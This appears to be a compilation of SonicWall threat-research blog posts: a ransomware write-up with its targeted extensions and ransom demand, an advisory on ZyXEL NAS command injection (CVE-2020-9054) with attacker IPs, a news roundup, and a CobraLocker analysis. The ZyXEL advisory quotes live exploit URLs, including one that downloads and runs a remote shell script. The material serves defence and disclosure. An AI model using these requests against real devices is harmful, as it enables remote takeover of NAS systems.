.exe, .der, .pfx, .key, .crt, .csr, .p12, .pem, .odt, .sxw, .stw, .3ds, .max, .3dm, .ods, .sxc, .stc, .dif, .slk, .wb2, .odp, .sxd, .std, .sxm, .sqlite3, .sqlitedb, .sql, .accdb, .mdb, .dbf, .odb, .mdf, .ldf, .cpp, .pas, .asm, .cmd, .bat, .vbs, .sch, .jsp, .php, .asp, .java, .jar, .class, .mp3, .wav, .swf, .fla, .wmv, .mpg, .vob, .mpeg, .asf, .avi, .mov, .mp4, .mkv, .flv, .wma, .mid, .m3u, .m4u, .svg, .psd, .tiff, .tif, .raw, .gif, .png, .bmp, .jpg, .jpeg, .iso, .backup, .zip, .rar, .tgz, .tar, .bak, .ARC, .vmdk, .vdi, .sldm, .sldx, .sti, .sxi, .dwg, .pdf, .wk1, .wks, .rtf, .csv, .txt, .msg, .pst, .ppsx, .ppsm, .pps, .pot, .pptm, .pptx, .ppt, .xltm, .xltx, .xlc, .xlm, .xlt, .xlw, .xls b, .xlsm, .xlsx, .xls, .dotm, .dot, .docm, .docx, .doc, .ndf, .pdf, .ib, .ibk, .bkp, .dll, pdb, .dat, .File, .ini, .bin, .PC, loli, .sys, .log, .xml, .vir, .prx, .ds, .mui, .amx, .aep, .csproj, .sln, .cs, .ico, .license, .vb, .resx, .vbproj, .settings, .asset, .json, .db, .md, .ios, .app, .xaml, .snk, .appxmanifest, .asax, .html, .index, .config, .cshtml, .js, .map, .ttf, .css, .aspx, .Master, .nff, .save, .vdproj, .info, .nfo, .flp, .suo, .rec, .studioonemacro, mid, .nvram, .vmsd, .vmx, .vmxf, .wav, .bbc, .cat, .daa, .cue, .nrg, .img, .mds, .ashdisc, .bwi, .b5i, .gi, .cdi, .pdi, .p01, .pxi, .ncd, .c2d, .cif, .lcd, .fcd, .vcd, .dmg, .bif, .uif, .isz, .wim, .ima, .package, .langpack, .cfg, .data, .PNF, .inf, .xsd, .cab, .dmp, .theme, .jnt, .msc, .cd, .user, .manifest, .application, .deploy, .c, .h, .filters, .vcxproj, .sqlproj, .cache, .dacpac, .pdb, .pub, .mpp, .ssk, .wtv, .SFX, .chm, .lst, .ion, .Targets, .lng, .ulf, .xsl, .tmp, .lock, .inc.php, .lib, .pm, .frm, .hlp, .it, .inc, .b4a, .bas, .scss, .nsi, .cgi, .var, .ax, .pck, .bik, .qtr, .vfs0, .vfx, .webm, .webcam, .rpkg, .xpi, .rc, .spr, .res, .tga, .video, .mdl, .lmp, .sc, .lua, .md5, .vst, .awk, .nki, .reg, .7z, .ace, .arj, .bz2, .cab, .gz, .jar, .lz, .lzh, .tar, .uue, .xz, .db, .dbs, .dll, .z, .ogg, .apk, .md, .dewar, .rst, .plist, .tmSnippetz

 

The key used to encrypt files can be found in the decompiled output.  However, this is not sufficient for decryption as the algorithm (RSA) is asymmetric and the private key (held only by the operators) is required to decrypt files:

 

We contacted the operators via email as instructed in the ransom message and had the following conversation:

 

 

 

$1000 in bitcoin to 1E7iXR1w7DVnzZPd8vYv9QVYHgN3eoZMWY is demanded:

 

The next day we even received a final warning:

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: BadBoy.RSM (Trojan)
  • GAV: Blackheart.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Hackers actively targeting remote code execution vulnerability on ZyXEL devices

SonicWall Capture Labs Threat Research team observed attackers actively targeting Zyxel NAS (Network Attached Storage) and firewall products affected by a remote code execution vulnerability.

Vulnerability | CVE-2020-9054

A NAS system is a storage device connected to a network that allows storage and retrieval of data from a centralized location for authorized network users and heterogeneous clients. ZyXEL NAS devices perform authentication by using the weblogin.cgi program. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains OS command, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code with root privileges on the device.

We observe the below hits more often as attackers scan for the vulnerable devices. In the username parameter, it sends the command “ls,” a vulnerable device will return without any error.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf"

On vulnerable devices, the attacker performs the below Http GET request which attempts to download a shell script to the “tmp” directory, execute the shell script “test.sh”, and later remove the script.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin;cd+%2Ftmp%3Bwget+http%3A%2F%2F62.171.171.24%2Ftest.sh%3Bsh+test.sh%3Brm+test.sh HTTP/1.1"

A quick search on shodan shows few hundreds of the affected ZyXEL NAS devices exposed online.

 

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15005 ZyXEL Firewall/NAS Remote Code Execution

Affected Products:

ZyXEL NAS products running firmware version 5.21 and earlier are affected by this vulnerability.

Users are recommended to install the standard firmware patches immediately. No updates available for NAS products that reached end-of-support, users are advised not to leave the product directly exposed to the internet. If possible, connect it to a security router or firewall for additional protection.

Find vendor advisory here

IOC:

Attacker IP’s:

62.171.171.24
108.41.185.191
95.55.151.170
110.29.165.15
83.228.1.77
213.59.131.51
201.21.226.33
222.138.203.0
77.76.182.174
103.123.150.66
182.180.173.249
194.143.248.230
128.90.164.48
103.234.226.145
75.145.190.44
94.227.15.86
108.7.223.135
169.1.233.212
114.129.28.252
89.211.220.169
37.191.233.81
187.143.247.123
116.196.65.202
47.101.136.228
93.114.113.103
154.126.79.223
187.182.168.14
14.234.48.139
92.70.17.98
177.81.219.19
91.227.50.230
122.230.145.99
95.76.102.94
77.52.185.59
67.165.140.191
187.120.194.22
82.222.168.10
94.225.181.234
124.123.127.69
61.239.185.168
190.139.6.182
213.164.215.33
103.240.77.52
124.109.50.214
122.117.143.35
114.220.117.147
109.130.153.176
83.23.126.120
93.40.11.165
213.153.153.219
103.133.122.6
203.40.91.116
186.158.175.131
69.254.107.46
2.26.219.16
177.41.37.241
73.185.241.75
200.117.244.223
220.184.203.94
41.188.62.215
177.39.102.151

 

 

 

 

Cybersecurity News & Trends – 06-26-20

Hackers made inroads this week with zero-day threats, massive DDoS attacks and point-of-sale compromises — but there were significant wins for the good guys, too.


SonicWall Spotlight

CEO Outlook 2020 – Bill Conner — CRN

  • CRN recently asked 80 of the industry’s top CEOs — including SonicWall’s Bill Conner — why 2020 will be the launch of the data decade.

MSPs will be forced to fix ‘rushed out’ remote working solutions post-COVID – Sonicwall CEO —  Channel Partner Insight

  • In an interview with CPI, Bill Conner explained that as changes to work patterns are likely to outlast the pandemic, pivoting out of lockdown will mean some of the earlier “temporary” remote working solutions will need to be re-engineered.

The Tel Aviv Tech Startups that are Solving COVID-19 Challenges — Forbes

  • Tel Aviv-based Perimeter 81, a provider of network security-as-a-service that recently completed a $10 million Series A led by SonicWall and existing investors, offers solutions that replace traditional VPNs.

Cybersecurity News

FBI warns K-12 schools of ransomware attacks via RDP —  ZDNet

  • The FBI has issued a security alert warning K-12 schools about ransomware gangs abusing RDP connections to break into school systems.

There are DDoS attacks, then there’s this 809 million packet-per-second tsunami Akamai says it just caught —  The Register

  • The attack, which targeted an unspecified European bank, was the largest such attack Akamai had ever encountered — and CDN believes it may be the largest DDoS attack to hit any network, ever.

This ransomware has learned a new trick: Scanning for point of sales
devices
—  ZDNet

  • Already one of the most dangerous forms of ransomware, Sodinokibi now looks like it could be attempting to make money from stolen payment information, too.

FBI sees major spike in coronavirus-related cyber threats — The Hill

  • FBI’s Internet Crime Complaint Center (IC3) has received 20,000 coronavirus-related cyber threat reports this year — as many as they received in all of 2019.

Republicans propose bill to end ‘warrant-proof’ encryption
The Washington Times

  • Republicans on the Senate Judiciary Committee introduced a bill Tuesday taking on the encryption technology that major tech companies use to secure customer data.

New WastedLocker ransomware demands payments of millions of USD —  ZDNet

  • Evil Corp, one of the biggest malware operations on the planet, has returned to life with a new ransomware strain.

Ransomware operators lurk on your network after their attack —  Bleeping Computer

  • While many believe attackers quickly deploy ransomware and leave so they won’t get caught, in reality threat actors are not so quick to give up a resource that they worked so hard to control.

Phishing and cryptocurrency scams squashed as one million emails are reported to new anti-scam hotline —  ZDNet

  • In the two months since its launch, the UK’s new anti-scam hotline has received an average of 16,500 emails per day, resulting in 10,000 links to online scams either blocked or taken down by authorities.

Hacker arrested for stealing, selling PII of 65K hospital employees
Bleeping Computer

  • 29-year-old Justin Sean Johnson has been arrested for allegedly stealing PII and W-2 information for over 65,000 University of Pittsburgh Medical Center employees and selling it on the dark web.

Security surprise: Four zero-days spotted in attacks on researchers’ fake networks —  ZDNet

  • Previously unknown attacks used against fake systems highlight big problems with industrial systems security.

In Case You Missed It

Cobralocker ransomware actively spreading in the wild

The SonicWall Capture Labs threat research team observed reports of a new variant family of COBRALOCKER ransomware [COBRALOCKER.RSM] actively spreading in the wild.

The COBRALOCKER ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. <Cobra>

Once the computer is compromised, the ransomware runs the following commands:

The ransomware encrypts all the files and appends the [Cobra] extension onto each encrypted file’s filename.

During our analysis, we have noticed the malware using the following Key to encrypt your files. (See source code below).

This makes our jobs easier to create a Decryptor tool for COBRALOCKER.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signature:

  • GAV: COBRALOCKER.RSM (Trojan)